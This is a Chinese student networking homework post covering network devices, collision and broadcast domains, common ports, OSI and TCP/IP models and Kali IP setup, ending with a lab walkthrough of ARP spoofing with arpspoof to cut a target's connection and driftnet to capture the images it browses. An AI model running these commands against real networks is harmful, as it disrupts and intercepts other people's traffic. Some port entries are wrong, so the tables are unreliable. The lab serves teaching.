Homework 2020/01/11(关键词:计算机网络,ARP欺骗)

Homework

Wang yuan can 

January  11, 2020

@雨人网安

作业

作业开始

1.作业提要

  • 网络设备运作原理
  • 端口
  • 计算机网络模型
  • 计算机网络协议
  • kali配置ip地址

2.作业分析

2.1 网桥,二层交换机,路由器的功能,广播域与冲突域的区别,讲解这些设备的运作方式

  为了更好地理解各个设备的原理,功能以及它们的区别,现对计算机网络各个层次的设备进行总结概述,从物理层设备开始分析。

  • 中继器(RP repeater)&集线器(Hub)

  中继器

  1.什么是中继器:中继器是连接网络线路的一种装置,是对信号进行再生和还原的网络设备。

  2.中继器的作用:由于存在损耗,在线路上传输的信号功率会逐渐衰减,衰减到一定程度时将造成信号失真,因此会导致接收错误。中继器就是为解决这一问题而设计的。它完成物理线路的连接,对衰减的信号进行放大,保持与原数据相同。

  3.中继器的特点:中继器是工作在物理层的设备,适用于完全相同的两个网络的互联,常用语两个网络节点之间的物理信号的双向转发工作。

  4.中继器的优缺点

  优点

  • 扩大了通信距离:
  • 增加了节点的最大数目;
  • 各网段可以使用不同的通信速率;
  • 提高了可靠性,当网络出现故障时,一般只影响个别网段;

  ps:中继器的主要优点是安装简单、使用方便、价格相对低廉。他不仅起到网络距离的作用,还可以将不同传输介质的网络连接在一起。中继器工作在物理层,对于高层协议完全透明。

  缺点

  • 由于中继器对收到被衰减的信号再生(恢复)到发送时的状态,并转发出去,增加了延时。
  • CAN总线的MAC子层并没有流量控制功能。当网络上的负载很重时,可能因中继器中缓冲区的存储空间不够而发生溢出,以致产生帧丢失的现象。
  • 中继器若出现故障,对相邻两个子网的工作都将产生影响。

  5.中继器“真颜”

      

 

 图2.1 中继器

 图2.2 中继器的应用图

  集线器

  1.什么是集线器:集线器是一个多端口的转发器,属于纯硬件的网络底层设备

  2.集线器的功能:集线器的主要功能是对接收到的信号进行再生整形放大,以扩大传输距离,同时把所有节点集中在以它为中心的节点上。

  3.集线器的特点:集线器工作在物理层,它的每个接口只会简单地收发比特(集线器不认识信号、地址或数据中的任何信息),不进行碰撞检测。

  4.集线器的运作过程:节点发信号到线路,集线器接收该信号,因信号在电缆传输中有衰减,集线器接收信号后将衰减的信号整形放大,最后集线器将放大的信号广播转发给其他所有端口。

  5.集线器“真颜”

  

 图2.3 集线器

   图2.4 集线器的组成

  • 网桥(Bridge)

  1.什么是网桥:网桥也叫桥接器,是连接两个局域网的存储转发设备。

  2.网桥的作用:网桥是一种对帧进行转发的技术,根据MAC分区块,可隔离碰撞,网桥将网络的各个网段在数据链路层连接起来。

  3.网桥的特点:网桥工作在数据链路层,将两个相似的网络连接起来,并对网络数据的流通进行管理。能扩展网络的距离或范围,提高网络的性能,可靠性和安全性。

  4.网桥的运作方式:现有两个网络,即网络1、2。网络1 和网络2 通过网桥连接后,网桥接收网络1 发送的数据包,检查数据包中的地址,如果地址属于网络1 ,它就将其放弃,相反,如果是网络2 的地址,它就继续发送给网络2.这样可利用网桥隔离信息,将同一个网络号划分成多个网段(属于同一个网络号),隔离出安全网段,防止其他网段内的用户非法访问。

  5.网桥的优缺点

  优点

  • 过滤通信量
  • 扩大了物理范围
  • 可使用不同的物理层,互联不同的局域网
  • 提高了可靠性

  缺点

  • 网桥对接收帧要先存储和查找站表,增加了时延
  • 没有流量控制的功能
  • 只适合用户数量不太多(不超过几百个)和信息量不太大的局域网,否则有时会产生较大的广播风暴

  6.网桥“真颜”

 图2.5 网桥工作图

  • 交换机(Switch)

  1.什么是交换机:交换机是一种用于电(光)信号转发的网络设备。

  2.交换机的作用:交换机工作在数据链路层,能够对数据的传输做到同步、放大和整形,而且可以过滤碎片,短帧。交换机可以隔离冲突域并有效抑制广播风暴的产生。

  3.交换机的运作方式:

  • 直通式:在输入端口检测到一个数据包时,检查该包的包头,获取包的目的地址,启动内部的动态查找表转换成相应的输出端口,在输入与输出交叉处接通,把数据包直通到相应的端口,实现交换功能。
  • 存储转发:把输入端口的数据包先存储起来,然后进行CRC(循环冗余校验)检查,在对错误包处理后才取出数据包的目的地址,通过查找表转换成输出端口送出包。
  • 碎片隔离:检查数据包的长度是否够64个字节,如果小于64字节,说明是假包,则丢弃该包;如果大于64字节,则发送该包。
  • 路由器(Router)

  1.什么是路由器:是连接两个或多个网络的硬件设备,在网络间起网关的作用,是读取每一个数据包中的地址然后决定如何传送的专用智能性的网络设备。

  2.路由器的作用:根据选定的路由算法将各数据包按最佳路线传送到指定位置。

  3.路由器的特点:路由器通常位于网络层,在不同的网络之间存储、分组转发处理,能在不同的逻辑分开网络。

  4.路由器的运作方式:根据具体的IP地址来转发数据。在同一个网络中,IP地址的网络地址必须是相同的。计算机之间的通信只能在具有相同网络地址的IP地址之间进行,如果想要与其他网段的计算机进行通信,则必须经过路由器转发出去。不同网络地址的IP地址是不能直接通信的,即便它们距离非常近,也不能进行通信。路由器的多个端口可以连接多个网段,每个端口的IP地址的网络地址都必须与所连接的网段的网络地址一致。不同的端口它的网络地址是不同的,所对应的网段也是不同的,这样才能使各个网段中的主机通过自己网段的IP地址把数据发送到路由器上。

  5.路由器“真颜”

 

 

图2.6 路由器

 

 图2.7 路由器工作过程

  • 冲突域(Collision Domian)&广播域(Broadcast Domain)

  冲突域

  1.什么是冲突域:一个站点向另一个站点发出信号,除目的站点外,有多少站点能收到这个信息,这些站点就构成一个冲突域。(冲突域基于第一层,即物理层)

  2.怎样避免冲突:对网络进行分割,分离流量并创建更小的冲突域来使用户或的更高的带宽。

  3.冲突域“真颜”

  

 图2.8 集线器下的冲突域

  广播域

  1.什么是广播域:网络中能接收任一设备发出的广播帧的所有设备的集合(广播域基于第二层,即数据链路层)

  2.广播域“真颜”

 图2.9 交换机下的广播域

  • 常见计算机设备与冲突域、广播域

计算机设备 能否隔离冲突域 能否隔离广播域
中继器 不能 不能
集线器 不能 不能
网桥 不能
交换机 不能
路由器

 

 图2.9 中继器与广播域,冲突域

 

  图2.10 集线器与广播域,冲突域

   图2.11 网桥与广播域,冲突域

   图2.12 交换机与广播域,冲突域

   图2.13 路由器与广播域,冲突域

2.2 常见端口表及其运行的服务

  • 远程连接服务
Service Port Transport Protocol
Telnet 23(明文传输,极不安全) TCP/UDP
SSH 22 TCP/UDP/SCTP
Windows Remote Desktop 3389 TCP
  • 文件传输
Service Port Transport Protocol
TFTP 69 UDP
FTP 21 TCP/UDP/SCTP
SFTP 115 TCP/UDP
  • E-mail
Service Port Port for SSL Transport Protocol
IMAP 143 993 TCP/UDP
SMTP 25 994/465 TCP/UDP
POP3 110 995 TCP
  •  Web
Service Port Transport Protocol
HTTP 80 TCP/UDP
HTTPS 443 TCP/UDP/SCTP
HTTP-ALT 8080 TCP/UDP
  •  数据库
Service Port Transport Protocol
Mircrosoft SQL Server TCP 1433 TCP/UDP
Mircrosoft SQL Server TCP 3306 TCP/UDP/SCTP
  •  VPN
Service Port Transport Protocol
PPTP 1723 TCP
L2TP 1701 UDP
IPSec 500/4500 UDP
  •  
Service Port Transport Protocol
Whois 43 TCP/UDP
Domain Name Server 53 TCP/UDP
Network Time Protocol 123 TCP/UDP
Netbios Name Service 137/138/139 TCP/UDP
Syslog 514 UDP

 2.3 计算机网络模型架构分析

典型的OSI七层模型及分析如下图所示,包含了详细的协议解读

2.3.1 OSI七层模型

七层模型,亦称OSI(Open System Interconnection)。该模型是国际标准化组织(ISO)制定的一个用于计算机或通信系统间互联的标准体系,一般称为OSI参考模型或七层模型。

  • 物理层:物理层的作用是实现相邻计算机节点之间比特流的透明传送,尽可能屏蔽掉具体传输介质和物理设备的差异。使其上面的数据链路层不必考虑网络的具体传输介质是什么。“透明传送比特流”表示经实际电路传送后的比特流没有发生变化,对传送的比特流来说,这个电路好像是看不见的。
  • 数据链路层:在计算机网络中由于各种干扰的存在,物理链路是不可靠的。因此,这一层的主要功能是在物理层提供的比特流的基础上,通过差错控制、流量控制方法,使有差错的物理线路变为无差错的数据链路,即提供可靠的通过物理介质传输数据的方法。该层通常又被分为介质访问控制(MAC)和逻辑链路控制(LLC)两个子层。
  • 网络层:通过路由选择算法,为报文或分组通过通信子网选择最适当的路径。该层控制数据链路层与传输层之间的信息转发,建立、维持和终止网络的连接。具体地说,数据链路层的数据在这一层被转换为数据包,然后通过路径选择、分段组合、顺序、进/出路由等控制,将信息从一个网络设备传送到另一个网络设备。
  • 传输层:向用户提供可靠的端到端的差错和流量控制,保证报文的正确传输。传输层的作用是向高层屏蔽下层数据通信的细节,即向用户透明地传送报文。该层常见的协议:TCP/IP中的TCP协议、Novell网络中的SPX协议和微软的NetBIOS/NetBEUI协议。传输层提供会话层和网络层之间的传输服务,这种服务从会话层获得数据,并在必要时,对数据进行分割。然后,传输层将数据传递到网络层,并确保数据能正确无误地传送到网络层。因此,传输层负责提供两节点之间数据的可靠传送,当两节点的联系确定之后,传输层则负责监督工作。
  • 会话层:向两个实体的表示层提供建立和使用连接的方法。将不同实体之间的表示层的连接称为会话。因此会话层的任务就是组织和协调两个会话进程之间的通信,并对数据交换进行管理。
  • 表示层:对来自应用层的命令和数据进行解释,对各种语法赋予相应的含义,并按照一定的格式传送给会话层。其主要功能是“处理用户信息的表示问题,如编码、数据格式转换和加密解密”等。
  • 应用层:直接向用户提供服务,完成用户希望在网络上完成的各种工作。它在其他6层工作的基础上,负责完成网络中应用程序与网络操作系统之间的联系,建立与结束使用者之间的联系,并完成网络用户提出的各种网络服务及应用所需的监督、管理和服务等各种协议。

2.3.2 TCP/IP四层模型

第一层:网络接口层

  包括用于协作IP数据在已有网络介质上传输的协议。实际上TCP/IP标准并不定义与ISO数据链路层和物理层相对应的功能。相反,它定义像地址解析协议(Address Resolution Protocol,ARP)这样的协议,提供TCP/IP协议的数据结构和实际物理硬件之间的接口。

  第二层:网间层

  对应于OSI七层参考模型的网络层。本层包含IP协议、RIP协议(Routing Information Protocol,路由信息协议),负责数据的包装、寻址和路由。同时还包含网间控制报文协议(Internet Control Message Protocol,ICMP)用来提供网络诊断信息。

  第三层:传输层

  对应于OSI七层参考模型的传输层,它提供两种端到端的通信服务。其中TCP协议(Transmission Control Protocol)提供可靠的数据流运输服务,UDP协议(Use Datagram Protocol)提供不可靠的用户数据报服务。

  第四层:应用层

  对应于OSI七层参考模型的应用层和表达层。因特网的应用层协议包括Finger、Whois、FTP(文件传输协议)、Gopher、HTTP(超文本传输协议)、Telent(远程终端协议)、SMTP(简单邮件传送协议)、IRC(因特网中继会话)、NNTP(网络新闻传输协议)等,

2.3.3 TCP/IP五层模型
五层模型 功能 每层功能概览

在用户空间利用进程交互实现,为应用进程规定并提供相关通信的细节。数据单元:报文

针对每个应用的协议:

电子邮件协议->SMTP (client/server模式)

远程登录协议->TELNET (C&S模式)

文件传输协议->FTP、HTTP  (超文本协议)

 

 

管理通信双方两节点间的数据传输,确保数据被可靠地传送到目标地址。传输单位:报文段、用户数据段

TCP:面向连接的、可靠的传输

UDP:无连接、最努力的传输

 

 

负责地址管理与路由选择,将运输层产生的报文段加上首部封装成分组(IP数据报),选择合适的路由进行分组交换传送。

传送单位:IP数据报(分组)

ICMP、IGMP网际协议、IP协议

 

 

负责物理层面节点间互连的数据帧传输,如物理地址寻址(MAX)、数据成帧、流量控制等   (IP数据报加首部成帧)传输单位:帧

ARP地址解析协议

帧中继

 

 

提供传输的物理媒介,实现比特流传输。单位:比特

RJ-45、RS-232等物理接口协议

 

2.4 计算机网络各层中的协议及其功能

  • 应用层: (典型设备:应用程序,如FTP,SMTP ,HTTP)

DHCP(Dynamic Host Configuration Protocol)动态主机分配协议,使用 UDP 协议工作,主要有两个用途:给内部网络或网络服务供应商自动分配 IP 地址,给用户或者内部网络管理员作为对所有计算机作中央管理的手段。实 现即插即用连网。

FTP (File Transfer Protocol)文件传输协议<端口号21>减少或消除不同操作系统下处理文件的不兼容性。

HTTP (Hypertext Transfer Protocol )超文本传输协议 <端口号 80>, 面向事务的应用层协议

SMTP (Simple Mail Transfer Protocol )简单邮件传输协议 <端口号25> 用于发送邮件。

RPC (Remote Procedure Call Protocol )(RFC- 1831)远程过程调用协 议 

  • 传输层: (典型设备: 进程和端口) 数据单元:数据段 (Segment)

TCP (Transmission Control Protocol )传输控制协议提供可靠的面向连接的服务,传输数据前须先建立连接,结束后释放。可靠的全双工信道。可靠、有序、无丢失、不重复。

UDP (User Datagram Protocol )用户数据报协议发送数据前无需建立连接,不使用拥塞控制,不保证可靠交付,最大努力交付。
网络层: (典型设备:路由器,防火墙、多层交换机) 数据单元:数据包(Packet )

IP (IPv4 · IPv6) (Internet Protocol) 网络之间互连的协议

ARP (Address Resolution Protocol) 即地址解析协议,实现通过IP 地址得 知其物理地址。

RARP (Reverse Address Resolution Protocol)反向地址转换协议允许局域 网的物理机器从网关服务器的 ARP 表或者缓存上请求其 IP地址。

ICMP (Internet Control Message Protocol )Internet 控制报文协议。它是TCP/IP 协议族的一个子协议,用于在IP 主机、路由器之间传递控制消息。

IGMP (Internet Group Management Protocol) Internet 组管理协议,是因特 网协议家族中的一个组播协议,用于 IP 主机向任一个直接相邻的路由器报 告他们的组成员情况。

  • 数据链路层: (典型设备: 网卡,网桥,交换机) 数据单元:帧 (Frame)

PPP(Point-to-Ponit Protocol):点对点协议面向字节,由三部分组成:一个将IP 数据报封装到串行链路的方法;一个用于建立、配置和测试数据链路连接的链路控制协议

停止等待协议
CSMA/CD(Carrrier Sense Multiple Access with Collision Detection)载波监听多点接入/碰撞检测协议。总线型网络,协议的实质是载波监听和碰撞检测。载波监听即发数据前先检测总线上是否有其他计算机在发送数据,如暂时不发数据,避免碰撞。碰撞检测为计算机边发送数据边检测信道上的信号电压大小。

ARQ(Automatic Repeat-reQuest )自动重传请求协议,错误纠正协议之一,包括停止等待ARQ 协议和连续ARQ 协议,错误侦测、正面确认、逾时重传与负面确认继以重传等机制。

  • 物理层:(典型设备:中继器,集线器、网线、HUB) 数据单元:比特 (Bit)

以太网物理层、调制解调器、PLC 、SONET/SDH 、G.709 、光导纤维、 同轴电缆、双绞线

2.5 kali如何配置静态ip地址

  • 打开Kali终端

 

  ps:要在root模式下操作

  • 打开网卡的配置文件,路径是/etc/network/interfaces
vim /etc/network/interfaces。
  • 对网卡进行静态ip配置
  • 配置DNS相关信息
vim /etc/resolv.conf
  • 重启网卡
service networking restart

2.6 学习PPT中的内容

2.6.1 ARP断网攻击
  • 查看kali虚拟机当前网卡eth0 mac地址,ip地址
ifconfig

  • 查看目标机的ip地址
ipconfig

 

 

  •  通过fping命令,查看当前局域网还存在哪些主机,确定要攻击的主机的ip地址
fping -g 192.168.110.0/24

 

 

  •  查看攻击前靶机网关的mac地址
arp -a

  • 攻击前靶机能正常获取网络数据
ping 8.8.8.8 -t

  • 实施断网攻击:arpspoof -i eth0 -t 192.168.110.144 192.168.110.2
arpspoof -i eth0 -t 192.168.110.144 192.168.110.2
//arpspoof -i 网卡 -t 目标ip 网关

  靶机显示“连接超时”

 

   靶机的网关mac地址与攻击机相同

 

2.6.2 内网截获图片
  • 设置ip流量转发,不会出现断网现象
echo 1  >/proc/sys/net/ipv4/ip_forward
  • 在arp欺骗之前,检查靶机能否上网

  • 进行arp欺骗
arpspoof  -i eth0 -t 192.168.110.144 192.168.110.2
  • 启动drifnet工具,捕获靶机正在浏览的图片
driftnet –i eth0
  • 在靶机中打开一个网页。浏览几张图片,并在kali的drifnet窗口中监看

3.思考总结

4.参考资料

  • 中继器:https://baike.baidu.com/item/%E4%B8%AD%E7%BB%A7%E5%99%A8/1867747?fr=aladdin
  • 集线器与中继器的区别:http://www.kokojia.com/article/25496.html
  •  集线器:https://baike.baidu.com/item/%E9%9B%86%E7%BA%BF%E5%99%A8/214614?fr=aladdin
  • 网桥:https://baike.baidu.com/item/%E7%BD%91%E6%A1%A5/99310?fr=aladdin
  • 路由器:https://baike.baidu.com/item/%E8%B7%AF%E7%94%B1%E5%99%A8/108294?fr=aladdin
  • 冲突域:https://baike.baidu.com/item/%E5%86%B2%E7%AA%81%E5%9F%9F/3536608?fr=aladdin
  • https://blog.csdn.net/bobozai86/article/details/80342350
  • 冲突域与广播域(区别、知识要点):https://blog.csdn.net/lzz_646297826/article/details/53785627
  • 常见的服务及端口概览:https://blog.csdn.net/RBPicsdn/article/details/85015705
  • 七层模型:https://baike.baidu.com/item/%E4%B8%83%E5%B1%82%E6%A8%A1%E5%9E%8B/1441391?fr=aladdin
  • OSI七层模型和TCP/IP模型对应协议(详解):https://blog.csdn.net/qq_41923622/article/details/85805003
  • 计算机网络各层协议:https://blog.csdn.net/qq_35660280/article/details/81865800
posted @ 2020-01-12 23:36  MkU  阅读(268)  评论(0编辑  收藏  举报